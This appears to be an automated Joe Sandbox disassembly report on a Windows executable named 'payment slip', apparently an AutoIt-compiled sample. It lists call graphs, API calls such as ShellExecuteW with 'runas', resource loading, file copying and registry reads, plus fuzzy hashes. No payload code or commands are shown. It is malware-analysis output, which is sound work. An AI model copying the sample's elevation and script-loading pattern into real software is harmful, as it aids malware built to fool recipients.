97611 65c51 97641 5f2c6 20 API calls __dosmaperr 97611->97641 97613->97540 97614->97545 97615->97556 97616->97555 97617->97545 97618->97544 97619->97549 97620->97545 97622 6f89b __fread_nolock 26 API calls 97621->97622 97623 6565e 
97622->97623 97625 65663 97623->97625 97652 62d74 38 API calls 3 library calls 97623->97652 97625->97580 97625->97581 97626 65686 97626->97625 97627 656a4 GetConsoleMode 97626->97627 97627->97625 97628->97566 97629->97573 97630->97598 97631->97576 97632->97582 97633->97598 97634->97571 97635->97593 97636->97593 97637->97602 97638->97602 97639->97602 97640->97611 97641->97598 97642->97598 97643->97603 97644->97598 97646 50a95 97645->97646 97647 50a97 IsProcessorFeaturePresent 97645->97647 97646->97569 97649 50c5d 97647->97649 97653 50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97649->97653 97651 50d40 97651->97569 97652->97626 97653->97651 97662 68585 97654->97662 97656 6862b 97656->97529 97657->97523 97658->97529 97659->97525 97660->97530 97661->97529 97663 68591 ___DestructExceptionObject 97662->97663 97673 65147 EnterCriticalSection 97663->97673 97665 6859f 97666 685c6 97665->97666 97667 685d1 97665->97667 97674 686ae 97666->97674 97689 5f2d9 20 API calls __dosmaperr 97667->97689 97670 685cc 97690 685fb LeaveCriticalSection __wsopen_s 97670->97690 97672 685ee __wsopen_s 97672->97656 97673->97665 97691 653c4 97674->97691 97676 686c4 97704 65333 21 API calls 3 library calls 97676->97704 97678 686be 97678->97676 97680 653c4 __wsopen_s 26 API calls 97678->97680 97688 686f6 97678->97688 97679 6871c 97687 6873e 97679->97687 97705 5f2a3 20 API calls 2 library calls 97679->97705 97682 686ed 97680->97682 97681 653c4 __wsopen_s 26 API calls 97683 68702 FindCloseChangeNotification 97681->97683 97685 653c4 __wsopen_s 26 API calls 97682->97685 97683->97676 97686 6870e GetLastError 97683->97686 97685->97688 97686->97676 97687->97670 97688->97676 97688->97681 97689->97670 97690->97672 97692 653e6 97691->97692 97693 653d1 97691->97693 97695 5f2c6 __dosmaperr 20 API calls 97692->97695 97697 6540b 97692->97697 97694 5f2c6 __dosmaperr 20 API calls 97693->97694 97696 653d6 97694->97696 97698 65416 97695->97698 97699 5f2d9 _free 20 API 
calls 97696->97699 97697->97678 97700 5f2d9 _free 20 API calls 97698->97700 97701 653de 97699->97701 97702 6541e 97700->97702 97701->97678 97703 627ec _strftime 26 API calls 97702->97703 97703->97701 97704->97679 97705->97687 97706->96937 97707 72ba5 97708 32b25 97707->97708 97709 72baf 97707->97709 97735 32b83 7 API calls 97708->97735 97750 33a5a 97709->97750 97713 72bb8 97757 39cb3 97713->97757 97716 32b2f 97725 32b44 97716->97725 97739 33837 97716->97739 97717 72bc6 97718 72bf5 97717->97718 97719 72bce 97717->97719 97722 333c6 22 API calls 97718->97722 97763 333c6 97719->97763 97733 72bf1 GetForegroundWindow ShellExecuteW 97722->97733 97726 32b5f 97725->97726 97749 330f2 Shell_NotifyIconW ___scrt_fastfail 97725->97749 97732 32b66 SetCurrentDirectoryW 97726->97732 97730 333c6 22 API calls 97730->97733 97731 72c26 97731->97726 97734 32b7a 97732->97734 97733->97731 97781 32cd4 7 API calls 97735->97781 97737 32b2a 97738 32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97737->97738 97738->97716 97740 33862 ___scrt_fastfail 97739->97740 97782 34212 97740->97782 97743 338e8 97745 73386 Shell_NotifyIconW 97743->97745 97746 33906 Shell_NotifyIconW 97743->97746 97786 33923 97746->97786 97748 3391c 97748->97725 97749->97726 97751 71f50 __wsopen_s 97750->97751 97752 33a67 GetModuleFileNameW 97751->97752 97753 39cb3 22 API calls 97752->97753 97754 33a8d 97753->97754 97755 33aa2 23 API calls 97754->97755 97756 33a97 97755->97756 97756->97713 97758 39cc2 _wcslen 97757->97758 97759 4fe0b 22 API calls 97758->97759 97760 39cea __fread_nolock 97759->97760 97761 4fddb 22 API calls 97760->97761 97762 39d00 97761->97762 97762->97717 97764 730bb 97763->97764 97765 333dd 97763->97765 97767 4fddb 22 API calls 97764->97767 97818 333ee 97765->97818 97769 730c5 _wcslen 97767->97769 97768 333e8 97772 36350 97768->97772 97770 4fe0b 22 API calls 97769->97770 97771 730fe __fread_nolock 97770->97771 97773 36362 97772->97773 97774 74a51 97772->97774 97833 36373 97773->97833 97843 
34a88 22 API calls __fread_nolock 97774->97843 97777 74a5b 97779 74a67 97777->97779 97780 3a8c7 22 API calls 97777->97780 97778 3636e 97778->97730 97780->97779 97781->97737 97783 735a4 97782->97783 97784 338b7 97782->97784 97783->97784 97785 735ad DestroyIcon 97783->97785 97784->97743 97808 9c874 42 API calls _strftime 97784->97808 97785->97784 97787 3393f 97786->97787 97806 33a13 97786->97806 97809 36270 97787->97809 97790 73393 LoadStringW 97794 733ad 97790->97794 97791 3395a 97792 36b57 22 API calls 97791->97792 97793 3396f 97792->97793 97795 733c9 97793->97795 97796 3397c 97793->97796 97801 33994 ___scrt_fastfail 97794->97801 97814 3a8c7 97794->97814 97799 36350 22 API calls 97795->97799 97796->97794 97798 33986 97796->97798 97800 36350 22 API calls 97798->97800 97802 733d7 97799->97802 97800->97801 97804 339f9 Shell_NotifyIconW 97801->97804 97802->97801 97803 333c6 22 API calls 97802->97803 97805 733f9 97803->97805 97804->97806 97807 333c6 22 API calls 97805->97807 97806->97748 97807->97801 97808->97743 97810 4fe0b 22 API calls 97809->97810 97811 36295 97810->97811 97812 4fddb 22 API calls 97811->97812 97813 3394d 97812->97813 97813->97790 97813->97791 97815 3a8ea __fread_nolock 97814->97815 97816 3a8db 97814->97816 97815->97801 97816->97815 97817 4fe0b 22 API calls 97816->97817 97817->97815 97819 333fe _wcslen 97818->97819 97820 33411 97819->97820 97821 7311d 97819->97821 97828 3a587 97820->97828 97822 4fddb 22 API calls 97821->97822 97824 73127 97822->97824 97826 4fe0b 22 API calls 97824->97826 97825 3341e __fread_nolock 97825->97768 97827 73157 __fread_nolock 97826->97827 97829 3a59d 97828->97829 97832 3a598 __fread_nolock 97828->97832 97830 7f80f 97829->97830 97831 4fe0b 22 API calls 97829->97831 97831->97832 97832->97825 97834 36382 97833->97834 97839 363b6 __fread_nolock 97833->97839 97835 74a82 97834->97835 97836 363a9 97834->97836 97834->97839 97838 4fddb 22 API calls 97835->97838 97837 3a587 22 API calls 97836->97837 97837->97839 97840 74a91 
97838->97840 97839->97778 97841 4fe0b 22 API calls 97840->97841 97842 74ac5 __fread_nolock 97841->97842 97843->97777 97844 68402 97849 681be 97844->97849 97847 6842a 97854 681ef try_get_first_available_module 97849->97854 97851 683ee 97868 627ec 26 API calls _strftime 97851->97868 97853 68343 97853->97847 97861 70984 97853->97861 97857 68338 97854->97857 97864 58e0b 40 API calls 2 library calls 97854->97864 97856 6838c 97856->97857 97865 58e0b 40 API calls 2 library calls 97856->97865 97857->97853 97867 5f2d9 20 API calls __dosmaperr 97857->97867 97859 683ab 97859->97857 97866 58e0b 40 API calls 2 library calls 97859->97866 97869 70081 97861->97869 97863 7099f 97863->97847 97864->97856 97865->97859 97866->97857 97867->97851 97868->97853 97872 7008d ___DestructExceptionObject 97869->97872 97870 7009b 97927 5f2d9 20 API calls __dosmaperr 97870->97927 97872->97870 97874 700d4 97872->97874 97873 700a0 97928 627ec 26 API calls _strftime 97873->97928 97880 7065b 97874->97880 97879 700aa __wsopen_s 97879->97863 97930 7042f 97880->97930 97883 706a6 97948 65221 97883->97948 97884 7068d 97962 5f2c6 20 API calls __dosmaperr 97884->97962 97887 706ab 97889 706b4 97887->97889 97890 706cb 97887->97890 97888 70692 97963 5f2d9 20 API calls __dosmaperr 97888->97963 97964 5f2c6 20 API calls __dosmaperr 97889->97964 97961 7039a CreateFileW 97890->97961 97894 706b9 97965 5f2d9 20 API calls __dosmaperr 97894->97965 97896 70781 GetFileType 97897 707d3 97896->97897 97898 7078c GetLastError 97896->97898 97970 6516a 21 API calls 3 library calls 97897->97970 97968 5f2a3 20 API calls 2 library calls 97898->97968 97899 70756 GetLastError 97967 5f2a3 20 API calls 2 library calls 97899->97967 97901 70704 97901->97896 97901->97899 97966 7039a CreateFileW 97901->97966 97903 7079a CloseHandle 97903->97888 97905 707c3 97903->97905 97969 5f2d9 20 API calls __dosmaperr 97905->97969 97907 70749 97907->97896 97907->97899 97909 707f4 97911 70840 97909->97911 97971 705ab 72 API calls 4 library calls 
97909->97971 97910 707c8 97910->97888 97915 7086d 97911->97915 97972 7014d 72 API calls 4 library calls 97911->97972 97914 70866 97914->97915 97916 7087e 97914->97916 97917 686ae __wsopen_s 29 API calls 97915->97917 97918 700f8 97916->97918 97919 708fc CloseHandle 97916->97919 97917->97918 97929 70121 LeaveCriticalSection __wsopen_s 97918->97929 97973 7039a CreateFileW 97919->97973 97921 70927 97922 7095d 97921->97922 97923 70931 GetLastError 97921->97923 97922->97918 97974 5f2a3 20 API calls 2 library calls 97923->97974 97925 7093d 97975 65333 21 API calls 3 library calls 97925->97975 97927->97873 97928->97879 97929->97879 97931 7046a 97930->97931 97932 70450 97930->97932 97976 703bf 97931->97976 97932->97931 97983 5f2d9 20 API calls __dosmaperr 97932->97983 97935 7045f 97984 627ec 26 API calls _strftime 97935->97984 97937 704a2 97938 704d1 97937->97938 97985 5f2d9 20 API calls __dosmaperr 97937->97985 97946 70524 97938->97946 97987 5d70d 26 API calls 2 library calls 97938->97987 97941 7051f 97943 7059e 97941->97943 97941->97946 97942 704c6 97986 627ec 26 API calls _strftime 97942->97986 97988 627fc 11 API calls _abort 97943->97988 97946->97883 97946->97884 97947 705aa 97949 6522d ___DestructExceptionObject 97948->97949 97991 62f5e EnterCriticalSection 97949->97991 97951 65234 97952 65259 97951->97952 97957 652c7 EnterCriticalSection 97951->97957 97960 6527b 97951->97960 97995 65000 97952->97995 97955 652a4 __wsopen_s 97955->97887 97958 652d4 LeaveCriticalSection 97957->97958 97957->97960 97958->97951 97992 6532a 97960->97992 97961->97901 97962->97888 97963->97918 97964->97894 97965->97888 97966->97907 97967->97888 97968->97903 97969->97910 97970->97909 97971->97911 97972->97914 97973->97921 97974->97925 97975->97922 97978 703d7 97976->97978 97977 703f2 97977->97937 97978->97977 97989 5f2d9 20 API calls __dosmaperr 97978->97989 97980 70416 97990 627ec 26 API calls _strftime 97980->97990 97982 70421 97982->97937 97983->97935 97984->97931 97985->97942 97986->97938 
97987->97941 97988->97947 97989->97980 97990->97982 97991->97951 98003 62fa6 LeaveCriticalSection 97992->98003 97994 65331 97994->97955 97996 64c7d __dosmaperr 20 API calls 97995->97996 97999 65012 97996->97999 97997 6501f 97998 629c8 _free 20 API calls 97997->97998 98000 65071 97998->98000 97999->97997 98004 63405 11 API calls 2 library calls 97999->98004 98000->97960 98002 65147 EnterCriticalSection 98000->98002 98002->97960 98003->97994 98004->97999 98005 31044 98010 310f3 98005->98010 98007 3104a 98046 500a3 29 API calls __onexit 98007->98046 98009 31054 98047 31398 98010->98047 98014 3116a 98015 3a961 22 API calls 98014->98015 98016 31174 98015->98016 98017 3a961 22 API calls 98016->98017 98018 3117e 98017->98018 98019 3a961 22 API calls 98018->98019 98020 31188 98019->98020 98021 3a961 22 API calls 98020->98021 98022 311c6 98021->98022 98023 3a961 22 API calls 98022->98023 98024 31292 98023->98024 98057 3171c 98024->98057 98028 312c4 98029 3a961 22 API calls 98028->98029 98030 312ce 98029->98030 98078 41940 98030->98078 98032 312f9 98088 31aab 98032->98088 98034 31315 98035 31325 GetStdHandle 98034->98035 98036 72485 98035->98036 98037 3137a 98035->98037 98036->98037 98038 7248e 98036->98038 98040 31387 OleInitialize 98037->98040 98039 4fddb 22 API calls 98038->98039 98041 72495 98039->98041 98040->98007 98095 a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98041->98095 98043 7249e 98096 a0944 CreateThread 98043->98096 98045 724aa CloseHandle 98045->98037 98046->98009 98097 313f1 98047->98097 98050 313f1 22 API calls 98051 313d0 98050->98051 98052 3a961 22 API calls 98051->98052 98053 313dc 98052->98053 98054 36b57 22 API calls 98053->98054 98055 31129 98054->98055 98056 31bc3 6 API calls 98055->98056 98056->98014 98058 3a961 22 API calls 98057->98058 98059 3172c 98058->98059 98060 3a961 22 API calls 98059->98060 98061 31734 98060->98061 98062 3a961 22 API calls 98061->98062 98063 3174f 
[Call graph: rendered as an interactive graph in the original report; only the node labels and edge list survive text extraction, so the edge list is collapsed here. Nodes are function addresses inside the sample (e.g. 31033, 3dd50, 3ec40, 41310, a6ef1, b7f59, 9f9b8, 33156, 342de, 503fb, 3b710), a few CRT helpers (__Init_thread_wait, __wsopen_s, __fread_nolock, _wcslen, _strftime, __onexit, ___scrt_fastfail, __dosmaperr) and the Windows APIs those functions reach. APIs named on the graph: message loop and UI (PeekMessageW, GetInputState, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, RegisterWindowMessageW, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, GetForegroundWindow, SystemParametersInfoW); timing (timeGetTime, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency); process and synchronisation (GetExitCodeProcess, WaitForSingleObject, WaitForSingleObjectEx, CloseHandle, GetCurrentProcess, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent); files (GetFileAttributesW, FindFirstFileW, FindClose, GetTempPathW, GetTempFileNameW, CreateFileW, CopyFileW, DeleteFileW, SetFileTime, GetFullPathNameW, GetStdHandle, GetFileType); registry (RegOpenKeyExW, RegQueryValueExW, RegCloseKey); loader and environment (LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleHandleW, VirtualAlloc, GetVersionExW, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, GetStartupInfoW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter); strings (lstrlenW, MultiByteToWideChar, CharLowerBuffW).]

                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                        control_flow_graph 234 342de-3434d call 3a961 GetVersionExW call 36b57 239 73617-7362a 234->239 240 34353 234->240 241 7362b-7362f 239->241 242 34355-34357 240->242 245 73632-7363e 241->245 246 73631 241->246 243 73656 242->243 244 3435d-343bc call 393b2 call 337a0 242->244 249 7365d-73660 243->249 262 343c2-343c4 244->262 263 737df-737e6 244->263 245->241 248 73640-73642 245->248 246->245 248->242 251 73648-7364f 248->251 252 73666-736a8 249->252 253 3441b-34435 GetCurrentProcess IsWow64Process 249->253 251->239 255 73651 251->255 252->253 256 736ae-736b1 252->256 258 34437 253->258 259 34494-3449a 253->259 255->243 260 736b3-736bd 256->260 261 736db-736e5 256->261 264 3443d-34449 258->264 259->264 265 736bf-736c5 260->265 266 736ca-736d6 260->266 268 736e7-736f3 261->268 269 736f8-73702 261->269 262->249 267 343ca-343dd 262->267 270 73806-73809 263->270 271 737e8 263->271 272 73824-73828 GetSystemInfo 264->272 273 3444f-3445e LoadLibraryA 264->273 265->253 266->253 274 343e3-343e5 267->274 275 73726-7372f 267->275 268->253 277 73715-73721 269->277 278 73704-73710 269->278 279 737f4-737fc 270->279 280 7380b-7381a 270->280 276 737ee 271->276 281 34460-3446e GetProcAddress 273->281 282 3449c-344a6 GetSystemInfo 273->282 285 343eb-343ee 274->285 286 7374d-73762 274->286 287 73731-73737 275->287 288 7373c-73748 275->288 276->279 277->253 278->253 279->270 280->276 289 7381c-73822 280->289 281->282 283 34470-34474 GetNativeSystemInfo 281->283 284 34476-34478 282->284 283->284 290 34481-34493 284->290 291 3447a-3447b FreeLibrary 284->291 292 73791-73794 285->292 293 343f4-3440f 285->293 294 73764-7376a 286->294 295 7376f-7377b 286->295 287->253 288->253 289->279 291->290 292->253 296 7379a-737c1 292->296 297 34415 293->297 298 73780-7378c 293->298 294->253 295->253 299 737c3-737c9 296->299 300 737ce-737da 296->300 297->253 298->253 299->253 300->253
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0003430D
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • GetCurrentProcess.KERNEL32(?,000CCB64,00000000,?,?), ref: 00034422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00034429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00034454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00034466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00034474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0003447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 000344A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                        • Instruction ID: 562c7bc3c51465ea5e242cbcf6fe9f8274ff7d4cb6b846dae06d5a91df09f111
                                        • Opcode Fuzzy Hash: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                        • Instruction Fuzzy Hash: 3FA1E962D0A2C4FFD726C76A7C815997FD87B26320F0884A8D0C59FE22D2BC45C4DB25

                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                        control_flow_graph 661 342a2-342ba CreateStreamOnHGlobal 662 342da-342dd 661->662 663 342bc-342d3 FindResourceExW 661->663 664 342d9 663->664 665 735ba-735c9 LoadResource 663->665 664->662 665->664 666 735cf-735dd SizeofResource 665->666 666->664 667 735e3-735ee LockResource 666->667 667->664 668 735f4-735fc 667->668 669 73600-73612 668->669 669->664
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000350AA,?,?,00000000,00000000), ref: 000342B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000350AA,?,?,00000000,00000000), ref: 000342C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735D3
                                        • LockResource.KERNEL32(000350AA,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20,?), ref: 000735E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                        • Instruction ID: 625e3f2b414380327432585323face6991277067d6ea4099553cec483d9908a7
                                        • Opcode Fuzzy Hash: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                        • Instruction Fuzzy Hash: 91117C70600700BFF7228BA6DC48F277BBDEBC6B51F148169F4169A660DB75EC008A20

                                        Control-flow Graph (image; legend: Executed / Not Executed)
                                        control_flow_graph 1469 72ba5-72ba9 1470 32b25-32b3b call 32b83 call 32c63 1469->1470 1471 72baf-72bcc call 33a5a call 39cb3 1469->1471 1480 32b44-32b4a call 3d760 1470->1480 1481 32b3d-32b3f call 33837 1470->1481 1482 72bf5-72bfd call 333c6 1471->1482 1483 72bce-72bf3 call 333c6 call 36350 call 333c6 1471->1483 1489 32b4f-32b56 1480->1489 1481->1480 1494 72bfe-72c26 GetForegroundWindow ShellExecuteW call 3988f 1482->1494 1483->1494 1492 32b58-32b5a call 330f2 1489->1492 1493 32b5f-32b80 call 33d1b SetCurrentDirectoryW call 3988f 1489->1493 1492->1493 1494->1493
                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                          • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,000F2224), ref: 00072C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,000F2224), ref: 00072C17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: e5363319f776892ac779de7997ffa0b32c105a7867d01484b3300c9087fdc557
                                        • Instruction ID: b3612dd68635b20a09b0c30cb29662cfe6234770ce8e18ef3c68b44ee27ee3ab
                                        • Opcode Fuzzy Hash: e5363319f776892ac779de7997ffa0b32c105a7867d01484b3300c9087fdc557
                                        • Instruction Fuzzy Hash: 4011D331608345AAD71AFF60DC92DFEB7AC9B91300F44542DF286520A3CFA58A49D712
                                        APIs
                                        • lstrlenW.KERNEL32(?,00075222), ref: 0009DBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 0009DBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0009DBEE
                                        • FindClose.KERNEL32(00000000), ref: 0009DBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                        • Instruction ID: e4ffe73aef33fab172df3e90f9c5bc0ea6c221d3859b5199aa57823ddc31fc77
                                        • Opcode Fuzzy Hash: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                        • Instruction Fuzzy Hash: 6CF0A0B085091197AA206B78EC0DCAA77AC9F02334B144703F83AC20E0EBB45D559695
                                        APIs
                                        • GetInputState.USER32 ref: 0003D807
                                        • timeGetTime.WINMM ref: 0003DA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB28
                                        • TranslateMessage.USER32(?), ref: 0003DB7B
                                        • DispatchMessageW.USER32(?), ref: 0003DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0003DBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: a7f9ebf430a288e4e2e01712d502da53cbdef3b28fddbc31905bb8fd54108397
                                        • Instruction ID: a6669a72be199b162cb4cd41d4cbafad4c8465486da3ff5d9a48b93596a99999
                                        • Opcode Fuzzy Hash: a7f9ebf430a288e4e2e01712d502da53cbdef3b28fddbc31905bb8fd54108397
                                        • Instruction Fuzzy Hash: 34421370608341EFE73ADF24D884FAAB7E9FF46300F14455AE49687292D774E884CB82

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                          • Part of subcall function 00033357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00033379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0003356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0007318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000731CE
                                        • RegCloseKey.ADVAPI32(?), ref: 00073210
                                        • _wcslen.LIBCMT ref: 00073277
                                        • _wcslen.LIBCMT ref: 00073286
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$T;$\$\Include\$xR
                                        • API String ID: 98802146-3832990523
                                        • Opcode ID: 9c3dc98e29042c72e36aaafd06537b94f683627fd579a50bdb33940a2bb9717e
                                        • Instruction ID: ce9a0307795971130691f30337513ce75d2081fc503c0219f6739acdb91eba59
                                        • Opcode Fuzzy Hash: 9c3dc98e29042c72e36aaafd06537b94f683627fd579a50bdb33940a2bb9717e
                                        • Instruction Fuzzy Hash: 4071D4715043019ED305EF65DC85DAFB7E8FF89340F40482EF5899B1A2EBB49A88CB52

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                        • RegisterClassExW.USER32(00000030), ref: 00032D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                        • LoadIconW.USER32(000000A9), ref: 00032D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
